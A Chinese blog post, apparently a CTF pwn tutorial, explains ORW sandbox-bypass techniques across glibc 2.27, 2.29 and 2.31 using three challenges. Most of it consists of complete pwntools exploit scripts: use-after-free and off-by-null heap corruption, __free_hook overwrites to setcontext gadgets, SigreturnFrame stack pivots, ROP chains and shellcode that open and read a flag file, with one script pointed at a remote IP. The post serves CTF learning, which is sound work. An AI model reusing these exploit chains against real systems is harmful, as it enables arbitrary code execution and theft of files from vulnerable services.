【八芒星计划】 ORW

最新推荐文章于 2024-02-07 20:14:39 发布
最新推荐文章于 2024-02-07 20:14:39 发布
阅读量3.9k 收藏 22
点赞数 5
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108351308
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

本篇用来记录ORW,ORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件
orw技术是用来应对沙盒的

文章目录

oooorder

本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难
2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏
最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的
2.27得setcontext:

<setcontext>:     push   rdi
<setcontext+1>:   lea    rsi,[rdi+0x128]
<setcontext+8>:   xor    edx,edx
<setcontext+10>:  mov    edi,0x2
<setcontext+15>:  mov    r10d,0x8
<setcontext+21>:  mov    eax,0xe
<setcontext+26>:  syscall 
<setcontext+28>:  pop    rdi
<setcontext+29>:  cmp    rax,0xfffffffffffff001
<setcontext+35>:  jae    0x7ffff7a7d520 <setcontext+128>
<setcontext+37>:  mov    rcx,QWORD PTR [rdi+0xe0]
<setcontext+44>:  fldenv [rcx]
<setcontext+46>:  ldmxcsr DWORD PTR [rdi+0x1c0]
<setcontext+53>:  mov    rsp,QWORD PTR [rdi+0xa0]
<setcontext+60>:  mov    rbx,QWORD PTR [rdi+0x80]
<setcontext+67>:  mov    rbp,QWORD PTR [rdi+0x78]
<setcontext+71>:  mov    r12,QWORD PTR [rdi+0x48]
<setcontext+75>:  mov    r13,QWORD PTR [rdi+0x50]
<setcontext+79>:  mov    r14,QWORD PTR [rdi+0x58]
<setcontext+83>:  mov    r15,QWORD PTR [rdi+0x60]
<setcontext+87>:  mov    rcx,QWORD PTR [rdi+0xa8]
<setcontext+94>:  push   rcx
<setcontext+95>:  mov    rsi,QWORD PTR [rdi+0x70]
<setcontext+99>:  mov    rdx,QWORD PTR [rdi+0x88]
<setcontext+106>: mov    rcx,QWORD PTR [rdi+0x98]
<setcontext+113>: mov    r8,QWORD PTR [rdi+0x28]
<setcontext+117>: mov    r9,QWORD PTR [rdi+0x30]
<setcontext+121>: mov    rdi,QWORD PTR [rdi+0x68]
<setcontext+125>: xor    eax,eax
<setcontext+127>: ret    
<setcontext+128>: mov    rcx,QWORD PTR [rip+0x356951]        # 0x7ffff7dd3e78
<setcontext+135>: neg    eax
<setcontext+137>: mov    DWORD PTR fs:[rcx],eax
<setcontext+140>: or     rax,0xffffffffffffffff
<setcontext+144>: ret

其作用是用户上下文的设置,所以我们在可以小范围控制执行流已知libc_base但不足以完成我们的目标时可以先跳setcontext+53来扩大控制范围。

非常好用,可以直接控制大部分寄存器和执行流。

注意:[rdi+0xa8](被弹到rcx的那个地址)对应的是 frame 框架的 rip 。

接下来开始分析:

free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext'] + 53
#--------------------------------------------------------------------------------------------------------
vul(8)
vul(8)
add(0x18, p64(free_hook))
add(0x18, p64(setcontext))

修改free_hook为setcontext+53,为什么是53呢

至于为什么要跳到 setcontext+53 这个位置。因为fldenv
[rcx]指令会造成程序执行的时候直接crash,所以要避开这个指令。

注意:要构造好rsp的值,因为有 push rcx 指令,如果rsp指向的内存不可访问,则会crash。

syscall=libc_base+libc.search(asm("syscall\nret")).next()
print(hex(syscall))
frame = SigreturnFrame()
frame.rax=0          #调用read
frame.rdi=0          #参数1     fd 0就是标准输入
frame.rsi=free_hook&0xfffffffffffff000    #参数2 要往哪里写
frame.rdx=0x2000                          #参数3 写多少字节
frame.rsp=free_hook&0xfffffffffffff000    #执行完之后要跳转的地址
frame.rip=syscall                         #执行什么
p=str(frame)

edit(9,p)                               #随便填充一个chunk
free(9)                                 #用修改的setcontext来触发,从而控制程序

使用 pwntools 的 SigreturnFrame()来构造ucontext_t结构体

layout = [
    libc_base+libc.search(asm("pop rdi\nret")).next(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).next(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).next(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).next(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).next(), #: jmp rsp;
]

shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')
sl(flat(layout) + shellcode)

后面的部分就是往free_hook&0xfffffffffffff000写入mprotect,以及orw的ROP,然后rsp跳转到free_hook&0xfffffffffffff000来执行,就完成了orw
也就是先read往free_hook&0xfffffffffffff000读入mprotect和orw的代码,然后跳转到free_hook&0xfffffffffffff000执行

同时这个方法不用在chunk里布置好flag,也就用不到heap_addr

2.27的orw代码:

free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext'] + 53
#--------------------------------------------------------------------------------------------------------
vul(8)
vul(8)
add(0x18, p64(free_hook))
add(0x18, p64(setcontext))

syscall=libc_base+libc.search(asm("syscall\nret")).next()
print(hex(syscall))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=free_hook&0xfffffffffffff000
frame.rdx=0x2000
frame.rsp=free_hook&0xfffffffffffff000
frame.rip=syscall
p=str(frame)

edit(9,p)
free(9)
layout = [
    libc_base+libc.search(asm("pop rdi\nret")).next(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).next(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).next(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).next(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).next(), #: jmp rsp;
]

shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')
sl(flat(layout) + shellcode)
r.interactive()

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './oooorder'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('121.196.180.65', 10001)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x4f2c5, 0x4f322, 0x10a38c]
def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sea('Your choice :\n', str(choice))

def add(size, content):
    menu(1)
    sea('How much is the order?\n', str(size))
    sea('Order notes:\n', content)
    
def edit(index, content):
    menu(2)
    sea('Index of order:\n', str(index))
    sea('Order notes:\n', content)

def vul(index):
    menu(2)
    sea('Index of order:\n', str(index))

def show():
    menu(3)

def free(index):
    menu(4)
    sea('Index of order:\n', str(index))

for i in range(8):
    add(0x98, 'aa')
add(0, '')
add(0x100, 'aa')
for i in range(7, -1, -1):
    free(i)
vul(8)
vul(8)
show()
ru('[8]:')
heap_addr = uu64(rc(6))
info('heap_addr', heap_addr)
heap_base = heap_addr - 0x880
unsorted_heap = heap_base + 0x280
add(0x18, p64(unsorted_heap))
show()
libc_base = uu64(ru('\x7f')[-6:]) - 0x10 - 96 - libc.sym['__malloc_hook']
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext'] + 53
#--------------------------------------------------------------------------------------------------------
vul(8)
vul(8)
add(0x18, p64(free_hook))
add(0x18, p64(setcontext))

syscall=libc_base+libc.search(asm("syscall\nret")).next()
print(hex(syscall))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=free_hook&0xfffffffffffff000
frame.rdx=0x2000
frame.rsp=free_hook&0xfffffffffffff000
frame.rip=syscall
p=str(frame)

edit(9,p)
free(9)
layout = [
    libc_base+libc.search(asm("pop rdi\nret")).next(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).next(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).next(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).next(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).next(), #: jmp rsp;
]

shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')
debug()
sl(flat(layout) + shellcode)
r.interactive()

还有一种使用heap_addr的,这种就相对简单,因为要多泄露一个heap_addr

free_hook = libc_base + libc.sym['__free_hook']
gadget = libc_base + libc.sym['setcontext'] + 53
fake_rsp = heap_base + 0x1d80       #找一块heap地址来使用
flag = fake_rsp - 0x10              #填好flag的地址,可以后续找好了再来填
add(0x10, 'aa')#8
add(0, '')#9
add(0x10, 'bb')#10
free(8)
vul(9)
free(9)
free(10)
add(0x10, p64(free_hook))
add(0x10, p64(gadget))

ret = libc_base + 0x00000000000008aa # ret
pop_rdi_ret = libc_base + 0x000000000002155f # pop rdi ; ret
pop_rsi_ret = libc_base + 0x0000000000023e6a # pop rsi ; ret 
pop_rdx_rsi_ret = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret
pop_rdx_ret = libc_base + 0x0000000000001b96 # pop rdx ; ret

p = 'a'*0xa0 + p64(fake_rsp) + p64(ret) #rsp  rip
p = p.ljust(0xb0, '\x00')
p += './flag\x00\x00'
p += p64(0)
p += p64(pop_rdi_ret) + p64(flag)
p += p64(pop_rsi_ret) + p64(0)
p += p64(libc_base+libc.sym['open'])
p += p64(pop_rdi_ret) + p64(3)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['read'])
p += p64(pop_rdi_ret) + p64(1)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['write'])
add(0x400, p)#10
free(10)

大致的思路就是在chunk里布置好orw和flag,然后触发就行0xa0是为了setcontext,参考一下应该就看懂了

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './oooorder'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('121.196.180.65', 10001)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sea('Your choice :\n', str(choice))

def add(size, content):
    menu(1)
    sea('How much is the order?\n', str(size))
    sea('Order notes:\n', content)
    
def edit(index, content):
    menu(2)
    sea('Index of order:\n', str(index))
    sea('Order notes:\n', content)

def vul(index):
    menu(2)
    sea('Index of order:\n', str(index))

def show():
    menu(3)

def free(index):
    menu(4)
    sea('Index of order:\n', str(index))

for i in range(8):
    add(0x300, 'aa')
for i in range(7, -1, -1):
    free(i)
for i in range(7):
    add(0x300, '\xe0')
show()
ru('[0]:')
heap_base = uu64(rc(6)) - 0x8e0
info('heap_base', heap_base)
add(0x1f0, '\xa0')
show()
ru('[7]:')
libc_base = uu64(rc(6)) - 608 - 0x10 - libc.sym['__malloc_hook']
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
gadget = libc_base + libc.sym['setcontext'] + 53
fake_rsp = heap_base + 0x1d80
flag = fake_rsp - 0x10
add(0x10, 'aa')#8
add(0, '')#9
add(0x10, 'bb')#10
free(8)
vul(9)
free(9)
free(10)
add(0x10, p64(free_hook))
add(0x10, p64(gadget))

ret = libc_base + 0x00000000000008aa # ret
pop_rdi_ret = libc_base + 0x000000000002155f # pop rdi ; ret
pop_rsi_ret = libc_base + 0x0000000000023e6a # pop rsi ; ret 
pop_rdx_rsi_ret = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret
pop_rdx_ret = libc_base + 0x0000000000001b96 # pop rdx ; ret

p = 'a'*0xa0 + p64(fake_rsp) + p64(ret)
p = p.ljust(0xb0, '\x00')
p += './flag\x00\x00'
p += p64(0)
p += p64(pop_rdi_ret) + p64(flag)
p += p64(pop_rsi_ret) + p64(0)
p += p64(libc_base+libc.sym['open'])
p += p64(pop_rdi_ret) + p64(3)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['read'])
p += p64(pop_rdi_ret) + p64(1)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['write'])
add(0x400, p)#10
free(10)
#debug()
#sl('1')

r.interactive()

2019-BALSN-CTF-plaintext

本题是2.29的orw
本题的前半部分是2.29的off by null,我在off by null那一篇已经讲过了,这里只介绍orw的部分
关键是劫持rsp到heap上
2.29的orw和2.27的orw的差别就在于setcontext这个函数由rdi变为rdx,所以我们要利用一个gadget来操纵rdx

setcontext这个函数的作用主要是用户上下文的获取和设置,可以利用这个函数直接控制大部分寄存器和执行流

.text:0000000000055E00                 public setcontext ; weak
.text:0000000000055E00 setcontext      proc near ; CODE XREF: .text:000000000005C16C↓p
.text:0000000000055E00                           ; DATA XREF: LOAD:000000000000C6D8↑o
.text:0000000000055E00                 push    rdi
.text:0000000000055E01                 lea     rsi, [rdi+128h]
.text:0000000000055E08                 xor     edx, edx
.text:0000000000055E0A                 mov     edi, 2
.text:0000000000055E0F                 mov     r10d, 8
.text:0000000000055E15                 mov     eax, 0Eh
.text:0000000000055E1A                 syscall                 ; $!
.text:0000000000055E1C                 pop     rdx
.text:0000000000055E1D                 cmp     rax, 0FFFFFFFFFFFFF001h
.text:0000000000055E23                 jnb     short loc_55E80
.text:0000000000055E25                 mov     rcx, [rdx+0E0h]
.text:0000000000055E2C                 fldenv  byte ptr [rcx]
.text:0000000000055E2E                 ldmxcsr dword ptr [rdx+1C0h]
.text:0000000000055E35                 mov     rsp, [rdx+0A0h]
.text:0000000000055E3C                 mov     rbx, [rdx+80h]
.text:0000000000055E43                 mov     rbp, [rdx+78h]
.text:0000000000055E47                 mov     r12, [rdx+48h]
.text:0000000000055E4B                 mov     r13, [rdx+50h]
.text:0000000000055E4F                 mov     r14, [rdx+58h]
.text:0000000000055E53                 mov     r15, [rdx+60h]
.text:0000000000055E57                 mov     rcx, [rdx+0A8h]
.text:0000000000055E5E                 push    rcx
.text:0000000000055E5F                 mov     rsi, [rdx+70h]
.text:0000000000055E63                 mov     rdi, [rdx+68h]
.text:0000000000055E67                 mov     rcx, [rdx+98h]
.text:0000000000055E6E                 mov     r8, [rdx+28h]
.text:0000000000055E72                 mov     r9, [rdx+30h]
.text:0000000000055E76                 mov     rdx, [rdx+88h]
.text:0000000000055E7D                 xor     eax, eax
.text:0000000000055E7F                 retn

使用ropper(ropgadget找不到)找到我们需要的gadget:

ropper -f /root/glibc-all-in-one/libs/2.29/libc-2.29.so --search 'mov rdx'

mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [rdi]; mov rdi, rdx; jmp rax;
在这里插入图片描述
好,我们就要把free_hook改成这个gadget,假设你已经改好了(有阅读过前半部分的话应该没问题)
接下来是2.29和2.27最不一样的部分
这样填写payload

payload = p64(libc_base + libc.symbols['setcontext'] + 0x1d) + p64(heap_addr + 0x1b50) + str_frame[0x10:]

①然后我们调用free后,流程会自动跳转至:

mov rdx, qword ptr [rdi + 8]
mov rax, qword ptr [rdi]
mov rdi, rdx
jmp rax

我们传入的[rdi]是p64(libc.symbols['setcontext'] + 0x1d) + p64(heap_address + 0x1b50)

②那么我们执行到jmp rax时,寄存器状况为rax = libc.symbols['setcontext'] + 0x1d , rdx = heap_address + 0x1b50,程序跳转执行libc.symbols['setcontext'] + 0x1d

③接下来将我们实现布置好的信息转移到对应寄存器内,栈迁移完成。

④最后程序将执行我们的ROP链,利用结束。

(0x1b50就是你的ucontext_t结构体的位置)

那么我们剩下要做的就是布置好SigreturnFrame()构造的ucontext_t结构体,以及后续rop的位置
2.27和2.29一样,都可以不要heap_addr来进行orw,但是2.29不需要heap_addr的话就需要你提前布置到free_hook下方的地址,那样就很麻烦,需要在前面就布置好,不像2.27最后一步可以一条龙
关键就是上面那一句的第二个部分导致无法一条龙,一定要提前填写ucontext_t结构体的位置

payload = p64(libc_base + libc.symbols['setcontext'] + 0x1d) + p64(heap_addr + 0x1b50) + str_frame[0x10:]

后续的就是rop了
orw的代码:

add(0x28, p64(free_hook))
add(0x28, 'a')
add(0x28, 'a')
add(0x28, p64(gadget))

frame = SigreturnFrame()
frame.rdi = heap_addr + 0x1b50 + 0x100 + 0x100
frame.rsi = 0
frame.rdx = 0x100
frame.rsp = heap_addr + 0x1b50 + 0x100
frame.rip = libc_base + 0x000000000002535f # : ret
frame.set_regvalue('&fpstate', heap_addr)

str_frame = str(frame)
payload = p64(libc_base + libc.symbols['setcontext'] + 0x1d) + p64(heap_addr + 0x1b50) + str_frame[0x10:]

layout = [
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    2,
    # sys_open("./flag", 0)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    3, # maybe it is 2
    libc_base + 0x0000000000026f9e, #: pop rsi; ret; 
    heap_addr + 0x10000,
    libc_base + 0x000000000012bda6, #: pop rdx; ret; 
    0x100,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    0,
    # sys_read(flag_fd, heap, 0x100)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    1,
    libc_base + 0x0000000000026f9e, #: pop rsi; ret; 
    heap_addr + 0x10000,
    libc_base + 0x000000000012bda6, #: pop rdx; ret; 
    0x100,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    1,
    # sys_write(1, heap, 0x100)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    0,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    231,
    # exit(0)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 
]
payload = payload.ljust(0x100, 'a') + flat(layout)
payload = payload.ljust(0x200, 'a') + './flag'
add(0x1000, payload)
print payload
free(37)

解释一下流程,free之后rax指向libc_base + libc.symbols[‘setcontext’] + 0x1d,rdx指向heap_addr + 0x1b50(结构体的位置),然后后面跟着的就是我们的结构体,然后setcontext弄完结构体,结构体里布置的是open的参数,rip可以理解为要执行的,rsp是执行完之后要去的地址

frame = SigreturnFrame()
frame.rdi = heap_addr + 0x1b50 + 0x100 + 0x100 #第一个参数flag的地址
frame.rsi = 0                                  #第二个参数0
frame.rdx = 0x100
frame.rsp = heap_addr + 0x1b50 + 0x100     #执行完之后要去的地址
frame.rip = libc_base + 0x000000000002535f # : ret
frame.set_regvalue('&fpstate', heap_addr)

后续就是orw的rop
也就是所有的数据都是在heap上的,我们是劫持了rsp到heap上来执行我们的rop

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './note'
local_libc  = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so'
remote_libc = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so'
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32 = [0x13e211, 0x13e212]
o_g = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(ch):
    sea('Choice: ', str(ch))
def add(size, content):
    menu(1)
    sea('size: ', str(size))
    sea('content: ', content)
def free(idx):
    menu(2)
    sea('idx: ', str(idx))
def show(idx):
    menu(3)
    sea('idx: ', str(idx))
for i in range(7):
    add(0x1000, 'aa')#0-6

add(0x1000+0xc00, 'aa')#7
for i in range(7):
    add(0x28, 'aa')#8-14

add(0xb20, 'largebin')#15
add(0x10, 'aa')#16

free(15)
#--------------------------------------------------------------------------------------------------------
add(0x1000, '\n')#15
add(0x28, p64(0) + p64(0x521) + p8(0x50))#17
#--------------------------------------------------------------------------------------------------------
add(0x28, 'a') # 18
add(0x28, 'b') # 19
add(0x28, 'c') # 20
add(0x28, 'd') # 21

for i in range(7):
    free(i+8)

free(20)
free(18)

for i in range(7):
    add(0x28, 'a')

add(0x400, 'a')#18

add(0x28,  p64(0) + p8(0x30))#20
#--------------------------------------------------------------------------------------------------------
add(0x28, 'clear') # 22
for i in range(7):
    free(i+8)
free(19)
free(17)
for i in range(7):
    add(0x28, 'a')
add(0x28, '\x30')#17
#--------------------------------------------------------------------------------------------------------
add(0x28, 'clear')#19
add(0x28, 'aa')#23
add(0x5f8, 'a')#24
add(0x100, 'a')#25
free(23)
add(0x28, "a"*0x20 + p64(0x520))#23
free(24)
#--------------------------------------------------------------------------------------------------------
add(0x40, 'a')#24
show(19)
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['__malloc_hook'] - 0x10 - 96
info('libc_base', libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
og = libc_base + o_g[1]
gadget = libc_base + 0x12be97
info('gadget', gadget)
info('test', free_hook&0xfffffffffffff000)
add(0x88, 'a')#26
add(0x28, 'a')#27
add(0x28, 'a')#28
free(28)
free(27)
show(18)
heap_addr = uu64(rc(6))
info('heap_addr', heap_addr)
for i in range(9):
    add(0x28, 'a')
for i in range(7):
    free(i+29)
free(27)
free(28)
free(18)
for i in range(7):
    add(0x28, 'a')
add(0x28, p64(free_hook))
add(0x28, 'a')
add(0x28, 'a')
add(0x28, p64(gadget))

frame = SigreturnFrame()
frame.rdi = heap_addr + 0x1b50 + 0x100 + 0x100
frame.rsi = 0
frame.rdx = 0x100
frame.rsp = heap_addr + 0x1b50 + 0x100
frame.rip = libc_base + 0x000000000002535f # : ret
frame.set_regvalue('&fpstate', heap_addr)

str_frame = str(frame)
payload = p64(libc_base + libc.symbols['setcontext'] + 0x1d) + p64(heap_addr + 0x1b50) + str_frame[0x10:]

layout = [
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    2,
    # sys_open("./flag", 0)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    3, # maybe it is 2
    libc_base + 0x0000000000026f9e, #: pop rsi; ret; 
    heap_addr + 0x10000,
    libc_base + 0x000000000012bda6, #: pop rdx; ret; 
    0x100,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    0,
    # sys_read(flag_fd, heap, 0x100)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    1,
    libc_base + 0x0000000000026f9e, #: pop rsi; ret; 
    heap_addr + 0x10000,
    libc_base + 0x000000000012bda6, #: pop rdx; ret; 
    0x100,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    1,
    # sys_write(1, heap, 0x100)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 

    libc_base + 0x0000000000026542, #: pop rdi; ret; 
    0,
    libc_base + 0x0000000000047cf8, #: pop rax; ret; 
    231,
    # exit(0)
    libc_base + 0x00000000000cf6c5, #: syscall; ret; 
]
payload = payload.ljust(0x100, 'a') + flat(layout)
payload = payload.ljust(0x200, 'a') + './flag'
add(0x1000, payload)
print payload
free(37)
#debug()
#sl('1')
r.interactive()

YCB easy_heap

2.31的off by null,发生在edit里,和2.29的差不多
具体讲一下orw的部分

2.31下的gadget和2.29的不一样

ropper -f /root/glibc-all-in-one/libs/2.31/libc-2.31.so --search 'mov rdx'

0x0000000000154890#mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

解释一下,就是在rdi+8那里放frame的addr,frame的0x20个字节后放setcontext,具体的可以自己调试

 

基本准备:

libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['__malloc_hook'] - 96 - 0x10
info('libc_base', libc_base)
gadget = libc_base + 0x0000000000154890#mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
IO_stdin = libc_base +  libc.sym['_IO_2_1_stdin_']
setcontext = libc_base + libc.sym['setcontext'] + 61
frame_addr = libc_base + libc.sym['_IO_2_1_stdin_'] + 0xe0
str_jumps = libc_base + 0x1ed560
pop_rdi = libc_base + 0x0000000000026b72 # pop rdi ; ret
pop_rsi = libc_base + 0x0000000000027529 # pop rsi ; ret
pop_rdx = libc_base + 0x000000000011c241 # pop rdx ; pop r12 ; ret
pop_rax = libc_base + 0x000000000004a5b0 # pop rax ; ret
syscall = libc_base+libc.search(asm("syscall\nret")).next()
ret = libc_base + 0x0000000000025679 # ret
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Puts = libc_base + libc.sym['puts']
Write = libc_base + libc.sym['write']

泄漏heap地址,自己找几个空的位置写flag,orw和frame

add(0x28)#22
add(0x28)#23
add(0x28)#24
add(0x28)#25
add(0x28)#26
for i in range(7):
    free(i+4)
free(26)
free(25)
for i in range(7):
    add(0x28)
show(17)
rc(9)
heap_addr = uu64(rc(6)) + 0xa60
heap_orw = heap_addr + 0x20
flag = heap_addr - 0xae0
frame_addr = heap_addr - 0x48e0
info('heap_addr', heap_addr)
info('flag', flag)
info('heap_orw', heap_orw)

 

add(0x28)#25
add(0x28)#26
for i in range(7):
    free(i+4)
free(22)
for i in range(7):
    add(0x28)
edit(16, p64(free_hook-0x10))
add(0x28)#22
add(0x28)#27
edit(27, p64(gadget))
edit(23, './flag\x00\x00')

frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = heap_orw
frame.rdx = 0x1000
frame.rsp = heap_orw
frame.rip = syscall
str_frame = str(frame)

p = p64(0)*4+p64(setcontext)
edit(0, p+str_frame[0x28:])

p = p64(0) + p64(frame_addr)

p2 = p64(pop_rdi) + p64(flag) + p64(pop_rsi) + p64(0)
p2 += p64(Open)
p2 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x200) + p64(0)
p2 += p64(Read)
p2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x200) + p64(0)
p2 += p64(Write)

edit(11, p)
debug()
free(11)
sl(p2)
#debug()
#sl('1')

r.interactive()

为什么可以不用mprotect,直接orw,因为这是在libc上进行的,而libc这段是可执行段
在这里插入图片描述
在这里插入图片描述
